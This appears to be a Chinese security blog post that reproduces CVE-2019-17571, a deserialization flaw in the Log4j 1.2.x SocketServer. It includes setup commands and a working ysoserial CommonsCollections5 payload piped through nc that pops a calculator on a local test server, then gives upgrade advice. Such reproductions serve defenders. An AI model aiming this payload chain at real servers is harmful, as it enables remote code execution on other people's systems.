Apache Log4j SocketServer反序列化漏洞复现(CVE-2019-17571)


Apache Log4j SocketServer 反序列化漏洞复现

Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个项目,是几种 Java 日志框架之一。

近日,Apache Log4j 官方披露在 1.2.x 版本中的SocketServer类存在反序列化漏洞(CVE-2019-17571),攻击者可利用漏洞可实现远程代码执行。

Log4j 1.2.x 版本中的 org.apache.log4j.net.SocketServer 类,存在反序列化漏洞。使用 Log4j SocketServer 类创建的 Socket 监听服务处理接受数据时,容易对不可信数据进行反序列化,结合反序列化小工具,攻击者可以实现远程代码执行。

环境搭建

用到的 jar 包:

java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 8888 ./log4jserver.properties ./

漏洞复现

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "open -a Calculator" | nc 127.0.0.1 8888

发送 payload 后,成功弹出计算器:

修复建议

  1. Apache Log4j 的 1.2 系列版本官方在2015年8月已停止维护,在 2.8.2 版本中已修复了该漏洞,建议尽快升级到 2.8.2 或更高的版本;
    下载地址:https://logging.apache.org/log4j/2.x/download.html

  2. 停止使用 Log4j 的 SocketServer 类创建 Socket 服务,未使用 Log4j 的 SocketServer 类的功能不受漏洞影响;


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Apache Solr模板注入远程代码执行漏洞 Apache Solr模板注入远程代码执行漏洞
Apache Solr 模板注入远程代码执行漏洞Apache Solr 是美国阿帕奇(Apache)软件基金会的一款基于 Lucene(一款全文搜索引擎)的搜索服务器。Apache Velocity 是一个提供 HTML 页面模板、emai
2020-01-02
下一篇 
Apache Solr CVE-2019-12409 RCE 漏洞复现 Apache Solr CVE-2019-12409 RCE 漏洞复现
Apache Solr CVE-2019-12409 RCE 漏洞复现该漏洞源于默认配置文件 solr.in.sh 中的 ENABLE_REMOTE_JMX_OPTS 配置选项存在安全风险。 如果使用受影响版本中的默认 solr.in.sh
2019-11-20
  目录